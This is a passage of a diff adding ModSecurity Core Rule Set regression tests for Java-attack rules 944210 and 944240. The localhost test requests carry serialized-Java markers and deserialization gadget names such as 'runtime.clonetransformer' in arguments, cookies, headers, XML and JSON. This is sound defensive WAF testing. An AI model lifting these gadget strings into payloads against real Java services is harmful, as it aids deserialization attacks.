"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Cs7QAF\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-46 + desc: "Content-Type application/json arg name 
includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Cs7QAF\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-47 + desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-48 + desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" 
+ data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-49 + desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-50 + desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" 
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
new file mode 100644
index 000000000..cbdcd2fb1
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
@@ -0,0 +1,1791 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944240.yaml" + description: "Positive tests for rule 944240" +tests: + - test_title: 944240-0 + desc: "Argument test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-1 + desc: "Argument name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-2 + desc: "Cookie test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.clonetransformer + method: "POST" + version: 
"HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-3 + desc: "Cookie name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.clonetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-4 + desc: "Request header test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-5 + desc: "XML attribute value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - 
test_title: 944240-6 + desc: "XML element value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-7 + desc: "Nested XML element value includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-8 + desc: "Content-Type text/plain includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-9 + desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" + stages: + - stage: + 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.clonetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-10 + desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-11 + desc: "Argument test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-12 + desc: "Argument name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-13 + desc: "Cookie test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-14 + desc: "Cookie name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.forclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-15 + desc: "Request header test includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-16 + desc: "XML attribute value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-17 + desc: "XML element value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-18 + desc: "Nested XML element value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-19 + desc: "Content-Type text/plain includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-20 + desc: "Content-Type application/json arg value includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.forclosure\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-21 + desc: "Content-Type application/json arg name includes keyword runtime.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.forclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-22 + desc: "Argument test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-23 + desc: "Argument name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-24 + desc: "Cookie test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatefactory + method: "POST" + 
version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-25 + desc: "Cookie name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-26 + desc: "Request header test includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-27 + desc: "XML attribute value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id 
\"944240\"" + - test_title: 944240-28 + desc: "XML element value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-29 + desc: "Nested XML element value includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-30 + desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-31 + desc: "Content-Type application/json arg value includes keyword 
runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatefactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-32 + desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-33 + desc: "Argument test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-34 + desc: "Argument name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: 
+ dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-35 + desc: "Cookie test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-36 + desc: "Cookie name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-37 + desc: "Request header test includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-38 + desc: "XML attribute value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + 